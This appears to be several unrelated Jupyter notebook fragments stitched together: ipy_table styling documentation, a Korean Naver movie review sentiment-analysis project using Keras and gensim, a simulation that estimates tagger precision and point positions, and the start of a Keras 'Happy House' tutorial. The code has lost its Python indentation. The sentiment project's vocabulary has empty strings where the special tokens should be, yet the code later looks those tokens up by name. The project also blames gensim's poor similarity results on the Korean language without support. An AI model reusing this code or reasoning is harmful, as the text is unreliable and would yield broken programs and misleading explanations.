### no_border
Accepts a comma-delimited list of cell edges, which may be any of: left, top, right, bottom. You can also specify 'all' to include all edges.
```
make_table(example_table)
set_cell_style(0,0, no_border='left,top')
set_cell_style(2,3, no_border='right,bottom')
make_table(example_table)
set_row_style(1, no_border='all')
```
### row_span
```
make_table(example_table)
set_cell_style(0, 0, row_span=3)
```
### column_span
```
make_table(example_table)
set_cell_style(1,1, column_span=3)
```
### width
Sets the cell width in pixels.
```
make_table(example_table)
set_cell_style(0,0, width=100)
```
### align
Sets the cell alignment. Accepts any of: left, right, center.
```
make_table(example_table)
set_cell_style(0, 0, width='100')
set_cell_style(0, 0, align='right')
set_cell_style(1, 0, align='center')
```
### wrap
Turns text wrapping on or off. By default, wrapping is off.
```
example_table2 = copy.deepcopy(example_table)
example_table2[0][0] = 'This cell has wrap set'
example_table2[0][1] = 'This cell does not have wrap set'
make_table(example_table2)
set_cell_style(0, 0, width=50,wrap=True)
set_cell_style(0, 1, width=50)
```
### float_format
Sets the display format for floating point values.
The float format string is a standard Python "%" format string (and should contain one and only one %f reference). See http://docs.python.org/2/library/stdtypes.html#string-formatting-operations
The float format only affects cells that contain ``float`` or ``numpy.float64`` data types, so you can use set_global_style to set a global floating point format and only those cells containing floating point data will be affected.
The default float format is '%0.4f'.
```
from ipy_table import *
example_table2 = [[i + float(i)/100.0 + i/10000.0 for i in range(j,j+4)] for j in range(0,30,10)]
make_table(example_table2)
set_cell_style(0, 0, float_format='%0.1f')
set_cell_style(1, 0, float_format='%0.6f')
set_cell_style(2, 0, float_format='$%0.2f')
```
## Class interface
```
t = IpyTable(example_table)
t.set_cell_style(1, 1, color='DarkCyan')
t
```
## Interactive interface with manual render
```
make_table(example_table, interactive=False)
set_row_style(1,color='yellow')
render()
```
## HTML Text Representation
The HTML text representation of the current table can be obtained by calling ``render()._repr_html_()``
```
render()._repr_html_()
```
## Tabulate
Use ``tabulate(list, n)`` to display a list (not an array) of data in a table with n columns.
```
tabulate(range(20), 6)
```
``tabulate()`` creates a table object just like ``make_table()``, so the same style operations can be applied.
```
set_cell_style(1, 2, color='yellow')
```
## Version
```
import ipy_table as ipt
ipt.__version__
```
# 7-11. Project: Sentiment Analysis of Naver Movie Reviews
In the previous steps we performed sentiment analysis on English text. This time, let's try sentiment analysis on Korean text. The dataset we will use is the Naver sentiment movie corpus, built from comments on Naver Movies.
Instead of downloading the data, create a symbolic link to the file from the Cloud shell.
### Evaluation Criteria
1. Successfully implemented the text classification task in a variety of ways (three or more models tried successfully).
2. Analyzed self-trained and pretrained embedding layers using gensim (used gensim's similar-word lookup to analyze both the self-trained and the pretrained embeddings appropriately).
3. Achieved a visible performance improvement using a Korean Word2Vec (reached at least 85% accuracy on the Naver movie review sentiment task).
```
!pip install --upgrade gensim==3.8.3
```
### 1) Data Preparation and Inspection
```
import pandas as pd
import urllib.request
%matplotlib inline
import matplotlib.pyplot as plt
import re
from konlpy.tag import Okt
from tensorflow import keras
from tensorflow.keras.preprocessing.text import Tokenizer
import numpy as np
from tensorflow.keras.preprocessing.sequence import pad_sequences
from collections import Counter
# Read in the data.
train_data = pd.read_table('~/aiffel/sentiment_classification/data/ratings_train.txt')
test_data = pd.read_table('~/aiffel/sentiment_classification/data/ratings_test.txt')
train_data.head()
```
### 2) Building the Data Loader
The IMDB dataset we used in practice comes preprocessed: calling imdb.data_loader() conveniently returns text already converted to integer indices, together with a word_to_index dictionary. The nsmc dataset we handle here, however, consists of completely unprocessed text files. We start by writing our own data_loader that reads them and behaves the same way as imdb.data_loader(). Inside the data_loader we need to:
- Remove duplicate entries
- Remove NaN missing values
- Tokenize with a Korean tokenizer
- Remove stopwords
- Build the word_to_index dictionary
- Convert text strings into index sequences
- Return X_train, y_train, X_test, y_test, word_to_index
```
from konlpy.tag import Mecab
tokenizer = Mecab()
stopwords = ['의','가','이','은','들','는','좀','잘','걍','과','도','를','으로','자','에','와','한','하다']
def load_data(train_data, test_data, num_words=10000):
train_data.drop_duplicates(subset=['document'], inplace=True)
train_data = train_data.dropna(how = 'any')
test_data.drop_duplicates(subset=['document'], inplace=True)
test_data = test_data.dropna(how = 'any')
X_train = []
for sentence in train_data['document']:
temp_X = tokenizer.morphs(sentence) # tokenize
temp_X = [word for word in temp_X if not word in stopwords] # remove stopwords
X_train.append(temp_X)
X_test = []
for sentence in test_data['document']:
temp_X = tokenizer.morphs(sentence) # tokenize
temp_X = [word for word in temp_X if not word in stopwords] # remove stopwords
X_test.append(temp_X)
words = np.concatenate(X_train).tolist()
counter = Counter(words)
counter = counter.most_common(num_words-4) # keep the most common words, reserving 4 slots for special tokens
vocab = ['', '', '', ''] + [key for key, _ in counter]
word_to_index = {word:index for index, word in enumerate(vocab)}
def wordlist_to_indexlist(wordlist):
return [word_to_index[word] if word in word_to_index else word_to_index[''] for word in wordlist]
X_train = list(map(wordlist_to_indexlist, X_train))
X_test = list(map(wordlist_to_indexlist, X_test))
return X_train, np.array(list(train_data['label'])), X_test, np.array(list(test_data['label'])), word_to_index
X_train, y_train, X_test, y_test, word_to_index = load_data(train_data, test_data)
index_to_word = {index:word for word, index in word_to_index.items()}
# Converts one sentence into a vector of word indices, given the dictionary.
# Note: every sentence is assumed to start with <BOS>.
def get_encoded_sentence(sentence, word_to_index):
return [word_to_index['<BOS>']]+[word_to_index[word] if word in word_to_index else word_to_index['<UNK>'] for word in sentence.split()]
# Encodes a list of sentences into word-index vectors all at once.
def get_encoded_sentences(sentences, word_to_index):
return [get_encoded_sentence(sentence, word_to_index) for sentence in sentences]
# Decodes an index-encoded sentence back into the original text.
def get_decoded_sentence(encoded_sentence, index_to_word):
return ' '.join(index_to_word[index] if index in index_to_word else '<UNK>' for index in encoded_sentence[1:]) # [1:] skips the <BOS> token
# Decodes several encoded sentences back into text at once.
def get_decoded_sentences(encoded_sentences, index_to_word):
return [get_decoded_sentence(encoded_sentence, index_to_word) for encoded_sentence in encoded_sentences]
# check that encoding round-trips through decoding correctly
print(X_train[0])
print(get_decoded_sentence(X_train[0], index_to_word))
print('label: ', y_train[0]) # label of the 1st review
```
#### The dataset has no PAD, BOS, or UNK tokens
Inspecting the dictionary shows that the PAD, BOS, and UNK tokens that should sit at the front are missing. Map them to indices 0, 1, and 2, respectively, and add them to the dictionary.
```
word_to_index
word_to_index["<PAD>"] = 0 # padding
word_to_index["<BOS>"] = 1 # start of every sentence
word_to_index["<UNK>"] = 2 # unknown token
index_to_word = {index:word for word, index in word_to_index.items()}
```
### 3) Data Analysis and Preparation for Model Building
- Distribution of sentence lengths within the dataset
- Choosing an appropriate maximum sentence length
  - The value of maxlen also affects overall model performance, so it is best to inspect the distribution over the whole dataset to find a suitable value.
- Adding padding with keras.preprocessing.sequence.pad_sequences
```
# distribution of sentence lengths within the dataset
print(X_train[0]) # 1st review
print('label: ', y_train[0]) # label of the 1st review
print('length of 1st review: ', len(X_train[0]))
print('length of 2nd review: ', len(X_train[1]))
# choose an appropriate maximum sentence length
total_data_text = list(X_train) + list(X_test)
# build a list of the sentence lengths of the text data
num_tokens = [len(tokens) for tokens in total_data_text]
num_tokens = np.array(num_tokens)
# compute the mean, max, and standard deviation of the sentence lengths
print('mean sentence length : ', np.mean(num_tokens))
print('max sentence length : ', np.max(num_tokens))
print('std of sentence lengths : ', np.std(num_tokens))
# for example, taking the maximum length to be (mean + 2*std):
max_tokens = np.mean(num_tokens) + 2 * np.std(num_tokens)
maxlen = int(max_tokens)
print('pad_sequences maxlen : ', maxlen)
print('{:.1f}% of all sentences fall within the maxlen setting.'.format(100 * np.sum(num_tokens < max_tokens) / len(num_tokens)))
print('max review length :', max(len(l) for l in X_train))
print('mean review length :', sum(map(len, X_train)) / len(X_train))
plt.hist([len(s) for s in X_train], bins=50)
plt.xlabel('length of samples')
plt.ylabel('number of samples')
plt.show()
```
##### At first I thought that the larger the fraction of sentences covered by the maxlen setting, the better.
##### However, dropping outlier data with extremely long sentences seemed more efficient for training, so maxlen was set to int(mean + 2*std).
```
X_train = keras.preprocessing.sequence.pad_sequences(X_train,
value=word_to_index["<PAD>"],
padding='post',
maxlen=maxlen)
X_test = keras.preprocessing.sequence.pad_sequences(X_test,
value=word_to_index["<PAD>"],
padding='post',
maxlen=maxlen)
print(X_train.shape)
X_train[0]
# use the first 50,000 training examples as the validation set
X_val = X_train[:50000]
y_val = y_train[:50000]
# use everything except the validation set as training data
partial_x_train = X_train[50000:]
partial_y_train = y_train[50000:]
print(partial_x_train.shape)
print(partial_y_train.shape)
print(X_val.shape)
print(y_val.shape)
```
### 4) Model Construction and Validation Set
Try at least three different model configurations.
#### 1-D Conv
```
vocab_size = 10000 # size of the vocabulary (10,000 words)
word_vector_dim = 16 # dimensionality of the embedding vector for each word
model = keras.Sequential()
model.add(keras.layers.Embedding(vocab_size, word_vector_dim, input_shape=(None,)))
model.add(keras.layers.Conv1D(16, 7, activation='relu'))
model.add(keras.layers.MaxPooling1D(5))
model.add(keras.layers.Conv1D(16, 7, activation='relu'))
model.add(keras.layers.GlobalMaxPooling1D())
model.add(keras.layers.Dense(8, activation='relu'))
model.add(keras.layers.Dense(1, activation='sigmoid')) # final output is 1-dim, indicating positive/negative
model.summary()
model.compile(optimizer='adam',
loss='binary_crossentropy',
metrics=['accuracy'])
epochs = 10
history = model.fit(partial_x_train,
partial_y_train,
epochs=epochs,
batch_size=512,
validation_data=(X_val, y_val),
verbose=1)
plt.figure(figsize=(12, 4))
plt.subplot(1, 2, 1)
plt.plot(history.history['loss'], marker='.', c='red', label='Train Loss')
plt.plot(history.history['val_loss'], marker='.', c='blue', label='Validation Loss')
plt.xlabel('Epoch')
plt.ylabel('Loss')
plt.legend()
plt.subplot(1, 2, 2)
plt.plot(history.history['accuracy'], 'g--', label='Train accuracy')
plt.plot(history.history['val_accuracy'], 'k--', label='Validation accuracy')
plt.xlabel('Epoch')
plt.ylabel('Accuracy')
plt.ylim(0, 1)
plt.legend()
plt.show()
# evaluate the model
results = model.evaluate(X_test, y_test, verbose=2)
print(results)
```
#### LSTM
```
from tensorflow.keras.layers import Embedding, LSTM, Dense, Bidirectional, GRU
# train_model() takes the optimizer as an argument
def train_model(Optimizer, X_train, y_train, X_val, y_val):
model = keras.Sequential()
model.add(Embedding(input_dim=10000, output_dim=16))
model.add(LSTM(units=128))
model.add(Dense(units=1, activation='sigmoid'))
model.compile(loss='binary_crossentropy', optimizer=Optimizer,
metrics=['accuracy'])
scores = model.fit(X_train, y_train, batch_size=512,
epochs=10,
validation_data=(X_val, y_val),
verbose=1)
return scores, model
RMSprop_score, RMSprop_model = train_model(Optimizer='RMSprop',
X_train=partial_x_train,
y_train=partial_y_train,
X_val=X_val,
y_val=y_val)
plt.figure(figsize=(12, 4))
plt.subplot(1, 2, 1)
plt.plot(RMSprop_score.history['loss'], marker='.', c='red', label='Train Loss')
plt.plot(RMSprop_score.history['val_loss'], marker='.', c='blue', label='Validation Loss')
plt.xlabel('Epoch')
plt.ylabel('Loss')
plt.legend()
plt.subplot(1, 2, 2)
plt.plot(RMSprop_score.history['accuracy'], 'g--', label='Train accuracy')
plt.plot(RMSprop_score.history['val_accuracy'], 'k--', label='Validation accuracy')
plt.xlabel('Epoch')
plt.ylabel('Accuracy')
plt.ylim(0, 1)
plt.legend()
plt.show()
# evaluate the model
results = RMSprop_model.evaluate(X_test, y_test, verbose=2)
print(results)
```
An accuracy of 85.10% was achieved.
#### Confusion Matrix
```
from sklearn.metrics import confusion_matrix
import seaborn as sns
plt.figure(figsize=(10, 7))
sns.set(font_scale=2)
y_test_pred = RMSprop_model.predict_classes(X_test)
c_matrix = confusion_matrix(y_test, y_test_pred)
ax = sns.heatmap(c_matrix, annot=True, xticklabels=['Negative Sentiment', 'Positive Sentiment'],
yticklabels=['Negative Sentiment', 'Positive Sentiment'], cbar=False, cmap='Blues', fmt='g')
ax.set_xlabel("Prediction")
ax.set_ylabel("Actual")
plt.show()
```
Most predictions were correct. Among the errors, 4,568 were negative and 2,758 were positive.
```
false_negatives = [] # predicted negative, but actually a positive review
false_positives = [] # predicted positive, but actually a negative review
for i in range(len(y_test_pred)):
if y_test_pred[i][0] != y_test[i]:
if y_test[i] == 0: # FP: False Positive
false_positives.append(i)
else: # FN
false_negatives.append(i)
print(false_negatives[20])
print(false_negatives[30])
print(false_negatives[100])
# cases that are actually positive reviews but were predicted as negative
string_1 = get_decoded_sentence(X_test[100], index_to_word).replace("<PAD>", "").strip()
string_2 = get_decoded_sentence(X_test[500], index_to_word).replace("<PAD>", "").strip()
string_3 = get_decoded_sentence(X_test[3000], index_to_word).replace("<PAD>", "").strip()
print(string_1)
print(string_2)
print(string_3)
print(false_positives[200])
print(false_positives[500])
print(false_positives[1500])
# cases that are actually negative reviews but were predicted as positive
string_1 = get_decoded_sentence(X_test[1000], index_to_word).replace("<PAD>", "").strip()
string_2 = get_decoded_sentence(X_test[15000], index_to_word).replace("<PAD>", "").strip()
string_3 = get_decoded_sentence(X_test[30000], index_to_word).replace("<PAD>", "").strip()
print(string_1)
print(string_2)
print(string_3)
```
#### Deep Learning
```
vocab_size = 10000 # size of the vocabulary (10,000 words)
word_vector_dim = 16 # dimensionality of the word vectors (a tunable hyperparameter)
# model design - write your own deep learning model code here
model = keras.Sequential()
# [[YOUR CODE]]
model.add(keras.layers.Embedding(vocab_size, word_vector_dim, input_shape=(None,)))
model.add(keras.layers.Conv1D(16, 7, activation='relu'))
model.add(keras.layers.MaxPooling1D(5))
model.add(keras.layers.Conv1D(16, 7, activation='relu'))
model.add(keras.layers.GlobalMaxPooling1D())
model.add(keras.layers.Dense(8, activation='relu'))
model.add(keras.layers.Dense(8, activation='relu'))
model.add(keras.layers.Dense(1, activation='sigmoid')) # final output is 1-dim, indicating positive/negative
model.summary()
model.compile(optimizer='adam',
loss='binary_crossentropy',
metrics=['accuracy'])
epochs=10 # adjust the number of epochs based on the results
history = model.fit(partial_x_train,
partial_y_train,
epochs=epochs,
batch_size=512,
validation_data=(X_val, y_val),
verbose=1)
results = model.evaluate(X_test, y_test, verbose=2)
print(results)
history_dict = history.history
print(history_dict.keys()) # metrics available for plotting against epoch
acc = history_dict['accuracy']
val_acc = history_dict['val_accuracy']
loss = history_dict['loss']
val_loss = history_dict['val_loss']
epochs = range(1, len(acc) + 1)
# "bo"는 "파란색 점"입니다
plt.plot(epochs, loss, 'bo', label='Training loss')
# "b" means "solid blue line"
plt.plot(epochs, val_loss, 'b', label='Validation loss')
plt.title('Training and validation loss')
plt.xlabel('Epochs')
plt.ylabel('Loss')
plt.legend()
plt.show()
plt.clf() # clear the figure
plt.plot(epochs, acc, 'bo', label='Training acc')
plt.plot(epochs, val_acc, 'b', label='Validation acc')
plt.title('Training and validation accuracy')
plt.xlabel('Epochs')
plt.ylabel('Accuracy')
plt.legend()
plt.show()
```
#### Word2Vec
In an earlier step we mentioned word embedding, an NLP technique that represents the characteristics of a word as a low-dimensional vector. It can substantially improve accuracy while cutting the heavy labeling cost of machine-learning-based sentiment analysis.
In fact, we already used a word embedding: the first layer of our model was an Embedding layer, a learnable parameter of size (number of words in our dictionary) x (word vector dimension). If our sentiment classifier trained well, the word vectors learned in that Embedding layer should also be arranged meaningfully in the embedding space. Let's check.
## Embedding layer analysis
```
import os
import gensim
# gensim = open-source library for unsupervised learning and NLP
from gensim.models.keyedvectors import Word2VecKeyedVectors
from tensorflow.keras.initializers import Constant
embedding_layer = model.layers[0]
weights = embedding_layer.get_weights()[0]
print(weights.shape)
word2vec_file_path = os.getenv('HOME')+'/aiffel/EXP_07_sentiment_classification/word2vec.txt'
f = open(word2vec_file_path, 'w')
f.write('{} {}\n'.format(vocab_size-4, word_vector_dim))
vectors = model.get_weights()[0]
for i in range(4,vocab_size):
f.write('{} {}\n'.format(index_to_word[i], ' '.join(map(str, list(vectors[i, :])))))
f.close()
```
- Save the learned embedding parameters to a file
- Using a for loop, write one word vector to the file for each word, excluding the special tokens
```
word_vectors = Word2VecKeyedVectors.load_word2vec_format(word2vec_file_path, binary=False)
word_vectors.similar_by_word("사랑")
```
- Load the embedding parameters recorded in the file and use them as word vectors
- Given a word, print the most similar words together with their similarity scores
- Checking similarity for the word '사랑' ("love"), the output words are essentially unrelated to it
- Yet the similarity scores for those words are above 0.85, which is quite high
- Seeing high similarity between words that are not actually similar suggests that gensim is not working well here, presumably because the input words are Korean
### Improving Performance with a Pretrained Korean Word2Vec Embedding
A Korean Word2Vec model can be obtained from:
- Pre-trained word vectors of 30+ languages (https://github.com/Kyubyong/wordvectors)
```
embedding_layer = model.layers[0]
weights = embedding_layer.get_weights()[0]
print(weights.shape) # shape: (vocab_size, embedding_dim)
import os
# Save the learned Embedding parameters to a file.
word2vec_file_path = os.getenv('HOME')+'/aiffel/sentiment_classification/data/word2vec.txt'
f = open(word2vec_file_path, 'w')
f.write('{} {}\n'.format(vocab_size-4, word_vector_dim)) # header line: how many vectors, and at what size
# Write one word vector per word (excluding the 4 special tokens).
vectors = model.get_weights()[0]
for i in range(4,vocab_size):
f.write('{} {}\n'.format(index_to_word[i], ' '.join(map(str, list(vectors[i, :])))))
f.close()
from gensim.models.keyedvectors import Word2VecKeyedVectors
word_vectors = Word2VecKeyedVectors.load_word2vec_format(word2vec_file_path, binary=False)
vector = word_vectors['사랑']
vector
word_vectors.similar_by_word("재밌")
# analyze the similarity!
from gensim.models import KeyedVectors
word2vec_path = os.getenv('HOME')+'/aiffel/EXP_07_sentiment_classification/word2vec/ko.tar.gz'
word2vec = KeyedVectors.load_word2vec_format(word2vec_path, binary=True, limit=1000000)
vector = word2vec['영화']
vector # a full 300-dim word vector
```
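The cell above loads the pretrained vectors but stops short of wiring them into the model. A common next step, sketched here under the assumption that the loaded `KeyedVectors` object and `word_to_index` are in scope, is to copy the pretrained vectors into a `(vocab_size, embedding_dim)` matrix and use it to seed the Embedding layer. The helper name `build_embedding_matrix` is illustrative, not from the original notebook.

```python
import numpy as np

def build_embedding_matrix(word_to_index, word_vectors, vocab_size, embedding_dim):
    """Copy pretrained vectors into a matrix; words without a pretrained
    vector keep a small random initialization."""
    rng = np.random.default_rng(0)
    matrix = rng.uniform(-0.05, 0.05, size=(vocab_size, embedding_dim))
    for word, idx in word_to_index.items():
        if idx < vocab_size and word in word_vectors:
            matrix[idx] = word_vectors[word]
    return matrix

# The matrix would then initialize the first layer, e.g.:
# keras.layers.Embedding(vocab_size, embedding_dim,
#     embeddings_initializer=keras.initializers.Constant(matrix),
#     trainable=True)
```

A gensim `KeyedVectors` object supports both `word in kv` and `kv[word]`, so it can be passed directly as `word_vectors`.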
# Gather statistics about the iterative point-position & tagger-precision estimation procedure
Perform $N_e$ experiments, in which data is simulated and used for the estimation procedure:
Simulate points $x_j$, tags $x_{ji} \sim N(x_j,\sigma_i^2)$ for N points ($j=1,...,N$) and $N_t$ taggers ($i=1,...,N_t$).
Perform the estimation procedure, and gather data after convergence:
1. The MSE for the estimation of $x_j$ (using the estimated sigmas, the real sigmas, and an equal-weight average)
2. The MSE for the estimation of $\sigma_i$
Gather data for different $N_t$, $\beta$.
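The alternating updates implemented below by `update_pos` and `update_sigma_sq` can be summarized as follows, where $T_j$ is the set of taggers that tagged point $j$ and $n_i$ is the number of scalar coordinates contributed by tagger $i$ (two per tag, since points are 2-D):

```latex
\hat{x}_j = \frac{\sum_{i \in T_j} w_i\, x_{ji}}{\sum_{i \in T_j} w_i},
\qquad w_i = \frac{1}{\hat{\sigma}_i^2 + \beta},
\qquad
\hat{\sigma}_i^2 = \frac{1}{n_i - 1} \sum_{j\,:\, i \in T_j} \lVert x_{ji} - \hat{x}_j \rVert^2
```

These two updates are iterated until the position estimates stop changing.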
```
import numpy as np
from numpy import linalg as LA
import matplotlib.pyplot as plt
import scipy
```
### Define functions that 1. Simulate the data 2. Run the estimation procedure
```
def simulate_data(N,Nt):
''' Simulate ground truth points, tagger properties, and tags
Args:
N (int): The number of ground truth points to simulate
Nt (int): The number of taggers
Returns:
gt_pos: a (N,2) np.array with ground truth positions in 2D
sigma_sq: a length Nt np.array containing sigma**2 of tagger i in index i
clusters: length N array. clusters[i][0]: a list of taggers that tagged the i-th gt point,
clusters[i][1]: the tags generated for the i-th gt point
'''
L = 100 # gt points will be in [0,L]x[0,L]
# properties of taggers
# draw each p_i; here low=high=1 fixes every detection probability to 1 (use low=0 to draw from [0,1])
p = np.random.uniform(low=1, high=1, size=(Nt)) #p[i] is the detection probability of tagger i
sigma_sq = np.random.uniform(low=0.5, high=3, size=(Nt))**2 # sigma_sq[i] is the var of position tagged by tagger i
# draw ground truth position uniformly in [0,L] x [0,L]
gt_pos = np.random.uniform(low=0,high=L,size=(N,2))
# simulate tags for each of the clusters
clusters = [None]*N # if there are no tags for gt point k, clusters[k] will remain None
cluster_is_tagged = [False]*N # cluster_is_tagged[k]==True iff there is at least one tag for gt point k
for k in range(N):
is_tagged = [np.random.binomial(n=1,p=p[i]) for i in range(Nt)]
tagged_ind = np.where(is_tagged)[0]
# if no tags exist, don't save this cluster
if any(is_tagged):
#tagged_ind = list(range(Nt))
tags = np.zeros((len(tagged_ind),2))
for j,i in enumerate(tagged_ind): # loop over tags that exist
# draw position from normal distribution
tags[j,:] = np.random.multivariate_normal(mean=gt_pos[k,:],cov=sigma_sq[i]*np.identity(2))
clusters[k] = (tagged_ind, tags)
cluster_is_tagged[k] = True
# only work with tagged points - throw away the untagged ones
Neffective = sum(cluster_is_tagged) # the number of tagged gt points
if Neffective<N:
gt_pos = gt_pos[cluster_is_tagged,:]
clusters = np.array(clusters)
clusters = clusters[cluster_is_tagged]
return sigma_sq, gt_pos, clusters
# given sigma_sq_est, estimate the gt position
def update_pos(clusters, sigma_sq_est, N, beta=0):
# beta = regularization parameter to prevent weight divergence to infinity
gt_pos_est = np.zeros((N,2))
for k in range(N): # loop over clusters
tagged_ind, tags = clusters[k]
weights = np.expand_dims(1/(sigma_sq_est[tagged_ind]+beta), axis=-1)
gt_pos_est[k,:] = np.sum(tags*weights,axis=0) / np.sum(weights)
return gt_pos_est
def update_sigma_sq(clusters, gt_pos_est, N, Nt):
# given estimated positions, estimate sigma_sq[i]
# for each cluster, accumulate data for all tags that exist.
# keep count of how many points have from each, then divide
s = np.zeros(Nt) # s[i] = sum over (x-gt)**2 for tagger i (2D since have x,y)
count = np.zeros(Nt) # count[i] = number of data points for tagger i
for k in range(N): # loop over clusters
tagged_ind, tags = clusters[k]
gt_pos_est_k = gt_pos_est[k,:]
shifted_tags = tags - gt_pos_est_k
s[tagged_ind] += np.sum(shifted_tags**2, axis=1)
count[tagged_ind] += 2 # summed samples (each point gives 1 sample for x, 1 for y)
s = s / (count-1) # estimator of sigma squared
# lower bound possible s values:
#s_sq_min = 0.1
#s[s<s_sq_min] = s_sq_min
return s #sigma_sq_est
def estimate_positions_and_sigmas(N,Nt,clusters,beta):
''' Perform iterations to estimate the positions and sigmas.
Args:
clusters: length N array. clusters[i][0]: a list of taggers that tagged the i-th gt point,
clusters[i][1]: the tags generated for the i-th gt point
beta: regularization parameter
Returns:
gt_pos_est, sigma_sq_est - estimates of gt positions, sigmas
'''
# set estimates to initial values
#p_est = 0.7*np.ones(Nt)
sigma_sq_est = 1*np.ones(Nt)
gt_pos_est = np.zeros((N,2))
diff_thresh = 1e-10
counter = 0
Nsteps_max= 1000 # if no convergence until reached, exit and display message
# perform first step of gt and sigma estimation
gt_pos_est_prev = gt_pos_est # save previous estimate
gt_pos_est = update_pos(clusters, sigma_sq_est, N, beta=beta)
sigma_sq_est = update_sigma_sq(clusters, gt_pos_est, N, Nt)
while LA.norm(gt_pos_est - gt_pos_est_prev)>diff_thresh:
gt_pos_est_prev = gt_pos_est
gt_pos_est = update_pos(clusters, sigma_sq_est, N, beta=beta)
sigma_sq_est = update_sigma_sq(clusters, gt_pos_est, N, Nt)
counter += 1
if counter==Nsteps_max:
print('Exited without converging after ' + str(Nsteps_max) + ' steps.')
break
#print(counter, LA.norm(gt_pos_est - gt_pos_est_prev))
#else:
#print('Converged after ', counter, ' steps.')
return gt_pos_est, sigma_sq_est
```
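The convergence pattern in `estimate_positions_and_sigmas` (iterate until the change in the estimate drops below a threshold, with a cap on the number of steps) can be isolated into a small self-contained sketch. The fixed-point map `np.cos` here is purely illustrative and stands in for the coupled position/sigma updates:

```python
import numpy as np

def iterate_to_convergence(update, x0, diff_thresh=1e-10, n_steps_max=1000):
    """Apply `update` repeatedly until the estimate stops changing.

    Same loop structure as estimate_positions_and_sigmas above; `update`
    and `x0` are stand-ins for the coupled position/sigma updates.
    """
    x_prev = x0
    x = update(x0)
    counter = 0
    while np.linalg.norm(x - x_prev) > diff_thresh:
        x_prev = x
        x = update(x)
        counter += 1
        if counter == n_steps_max:
            print('Exited without converging after ' + str(n_steps_max) + ' steps.')
            break
    return x, counter

# Toy fixed point: x -> cos(x) converges to the Dottie number (~0.739).
x_star, n = iterate_to_convergence(np.cos, np.array([1.0]))
```

Because the map is a contraction near the fixed point, the loop terminates well before `n_steps_max`.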
### Set parameters, initialize variables to collect results
```
#Ns = 1000 # number of repeats for each parameter value
Ns = 30
N = 2000 # number of points simulated in each instance
Nt = 3 # number of taggers
beta_list = np.arange(0,2,0.2)
#beta_list = np.array([0,0.25,0.5,0.75,1])
Nbeta = len(beta_list)
# beta = 1
# sigma_sq, gt_pos, clusters = simulate_data(N,Nt)
# gt_pos_est, sigma_sq_est = estimate_positions_and_sigmas(N,Nt,clusters,beta)
# collect stats
# initialize variables
min_sigma_sq = np.zeros((Ns,Nbeta))
pos_mse = np.zeros((Ns,Nbeta))
sigma_sq_mse = np.zeros((Ns,Nbeta))
pos_mse_real_sigma = np.zeros((Ns))
pos_mse_naive_average = np.zeros((Ns))
import time
t = time.time()
# for each instance of simulated data, perform the estimation with varying beta
for i in range(Ns):
sigma_sq, gt_pos, clusters = simulate_data(N,Nt) # simulate data
for j, beta in enumerate(beta_list):
gt_pos_est, sigma_sq_est = estimate_positions_and_sigmas(N,Nt,clusters,beta) # perform estimation
# collect stats about estimation result
min_sigma_sq[i,j] = min(sigma_sq_est)
SE_pos_est = np.sum((gt_pos_est - gt_pos)**2,axis=1)
pos_mse[i,j] = np.mean(SE_pos_est)
sigma_diff = sigma_sq - sigma_sq_est
sigma_sq_mse[i,j] = np.mean(sigma_diff**2)
# collect stats about instance of simulated data
gt_pos_est_real_s = update_pos(clusters, sigma_sq, N)
SE_real_s_est = np.sum((gt_pos_est_real_s - gt_pos)**2,axis=1)
pos_mse_real_sigma[i] = np.mean(SE_real_s_est)
gt_pos_est_equal_s = update_pos(clusters, np.ones(sigma_sq.shape), N)
SE_equal_s_est = np.sum((gt_pos_est_equal_s - gt_pos)**2,axis=1)
pos_mse_naive_average[i] = np.mean(SE_equal_s_est)
elapsed = time.time() - t
print(elapsed/60)
```
## Plot results
```
mean_min_sigma = np.mean(min_sigma_sq, axis=0) # mean over instances, as function of beta
plt.plot(beta_list,mean_min_sigma,'.b')
plt.xlabel('$\\beta$',fontsize=16)
plt.ylabel(r'$\min_i \hat{\sigma}_i$',fontsize=16);
plt.xticks(fontsize=14)
plt.yticks(fontsize=14);
import scipy.stats
mean_pos_mse = np.mean(pos_mse,axis=0) # mean over Ns simulated data instances
mean_pos_mse_real_sigma = np.mean(pos_mse_real_sigma)
mean_pos_mse_naive_average = np.mean(pos_mse_naive_average)
std_pos_mse = np.std(pos_mse,axis=0) # mean over Ns simulated data instances
std_pos_mse_real_sigma = np.std(pos_mse_real_sigma)
std_pos_mse_naive_average = np.std(pos_mse_naive_average)
sem_pos_mse = scipy.stats.sem(pos_mse,axis=0) # mean over Ns simulated data instances
sem_pos_mse_real_sigma = scipy.stats.sem(pos_mse_real_sigma)
sem_pos_mse_naive_average = scipy.stats.sem(pos_mse_naive_average)
plt.figure()
h = [None]*3
h[0], = plt.plot(beta_list,mean_pos_mse,'.--b')
h[1], = plt.plot(beta_list,np.ones(len(beta_list))*mean_pos_mse_real_sigma,'--g')
h[2], = plt.plot(beta_list,np.ones(len(beta_list))*mean_pos_mse_naive_average,'--r')
plt.fill_between(beta_list, mean_pos_mse - sem_pos_mse, mean_pos_mse + sem_pos_mse, color='blue', alpha=0.2)
#plt.errorbar(beta_list,mean_pos_mse,sem_pos_mse)
plt.fill_between(beta_list, np.ones(len(beta_list))*mean_pos_mse_real_sigma - np.ones(len(beta_list))*sem_pos_mse_real_sigma, np.ones(len(beta_list))*mean_pos_mse_real_sigma + np.ones(len(beta_list))*sem_pos_mse_real_sigma, color='green', alpha=0.2)
plt.fill_between(beta_list, np.ones(len(beta_list))*mean_pos_mse_naive_average - np.ones(len(beta_list))*sem_pos_mse_naive_average, np.ones(len(beta_list))*mean_pos_mse_naive_average + np.ones(len(beta_list))*sem_pos_mse_naive_average, color='red', alpha=0.2)
plt.xlabel('$\\beta$',fontsize=16)
plt.ylabel('MSE of $x_j$ estimate',fontsize=16);
plt.xticks(fontsize=14)
plt.yticks(fontsize=14);
plt.legend(h, ('est', r'real $\sigma_i$', 'naive'));
mean_sigma_sq_mse = np.mean(sigma_sq_mse, axis=0) # mean over instances, as function of beta
sem_sigma_sq_mse = scipy.stats.sem(sigma_sq_mse, axis=0) # mean over instances, as function of beta
#plt.plot(beta_list,mean_sigma_sq_mse,'.b')
plt.errorbar(beta_list,mean_sigma_sq_mse,sem_sigma_sq_mse,fmt='o')
plt.xlabel('$\\beta$',fontsize=16)
plt.ylabel(r'$MSE(\hat{\sigma}_i)$',fontsize=16);
plt.xticks(fontsize=14)
plt.yticks(fontsize=14);
```
# Keras tutorial - the Happy House
Welcome to the first assignment of week 2. In this assignment, you will:
1. Learn to use Keras, a high-level neural networks API (programming framework), written in Python and capable of running on top of several lower-level frameworks including TensorFlow and CNTK.
2. See how you can in a couple of hours build a deep learning algorithm.
